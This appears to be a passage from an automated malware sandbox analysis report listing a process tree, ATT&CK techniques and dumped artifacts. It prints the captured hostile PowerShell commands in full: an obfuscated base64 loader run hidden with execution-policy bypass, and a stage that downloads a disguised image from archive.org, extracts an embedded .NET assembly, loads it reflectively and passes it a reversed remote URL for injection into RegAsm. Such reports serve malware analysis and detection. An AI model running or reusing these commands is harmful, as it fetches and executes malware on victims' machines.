⌼6⽃ ⇯ ⿉ ⭋ ⌼EY⽃ ⇯ ⿉ ⭋ ⌼cgBv⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼QgBh⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼ZQ⽃ ⇯ ⿉ ⭋ ⌼2⽃ ⇯ ⿉ ⭋ ⌼DQ⽃ ⇯ ⿉ ⭋ ⌼UwB0⽃ ⇯ ⿉ ⭋ ⌼HI⽃ ⇯ ⿉ ⭋ ⌼aQBu⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼YQBz⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Ng⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼EM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bv⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼QQBz⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼ZQBt⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼B5⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBS⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼ZgBs⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YwB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bwBu⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼QQBz⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼ZQBt⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼B5⽃ ⇯ ⿉ ⭋ ⌼F0⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼6⽃ ⇯ ⿉ ⭋ ⌼Ew⽃ ⇯ ⿉ ⭋ ⌼bwBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼QgB5⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼ZQBz⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼eQBw⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bs⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼YQBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼BB⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼cwBl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YgBs⽃ ⇯ ⿉ ⭋ ⌼Hk⽃ ⇯ ⿉ ⭋ ⌼LgBH⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼BU⽃ ⇯ ⿉ ⭋ ⌼Hk⽃ ⇯ ⿉ ⭋ ⌼c⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼JwBk⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼LgBJ⽃ ⇯ ⿉ ⭋ ⌼E8⽃ ⇯ ⿉ ⭋ ⌼LgBI⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼bQBl⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼bQBl⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼Bv⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼Hk⽃ ⇯ ⿉ ⭋ ⌼c⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼RwBl⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼TQBl⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼Bv⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼FY⽃ ⇯ ⿉ ⭋ ⌼QQBJ⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgB2⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼awBl⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bu⽃ ⇯ ⿉ ⭋ ⌼HU⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bs⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼Bb⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼YgBq⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YwB0⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼XQBd⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼TwBI⽃ ⇯ ⿉ ⭋ ⌼FQ⽃ ⇯ ⿉ ⭋ ⌼VQBB⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼NQ⽃ ⇯ ⿉ ⭋ ⌼1⽃ ⇯ ⿉ ⭋ ⌼DE⽃ ⇯ ⿉ ⭋ ⌼Lw⽃ ⇯ ⿉ ⭋ ⌼y⽃ ⇯ ⿉ ⭋ ⌼Dc⽃ ⇯ ⿉ ⭋ ⌼MQ⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Dc⽃ ⇯ ⿉ ⭋ ⌼Mw⽃ ⇯ ⿉ ⭋ ⌼y⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼O⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼y⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼OQ⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼DE⽃ ⇯ ⿉ ⭋ ⌼Lw⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼Do⽃ ⇯ ⿉ ⭋ ⌼c⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼L⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼YQB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼dgBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼bw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼L⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼YQB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼dgBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼bw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼L⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼YQB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼dgBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼bw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼JwBS⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼ZwBB⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼bQ⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼Jw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⽃ ⇯ ⿉ ⭋ ⌼','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OHTUA/551/271.732.82.941//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1f5b7cc32eddb49516d9be5520404893

SHA1
76ebd317f9ec76f9781de04bb27c3da9b3714c8a

SHA256
a8d98e6f58676c005785aebdc8e9255933c16a6d23fc2b7ff366709c3a89fb98

SHA512
41f26b9a900de948700fe5c0dfbeae26e4a290083c9ded9902c432b9e2d8d7cafeec61cb64123e2df91dd0b78fb2ee55904d04fe9a5df424cc2ea1abd63e5881

Download Submit
memory/2884-4-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

Filesize
4KB

Download
memory/2884-5-0x000000001B500000-0x000000001B7E2000-memory.dmp

Filesize
2.9MB

Download
memory/2884-6-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2884-12-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2884-13-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download
memory/2884-14-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing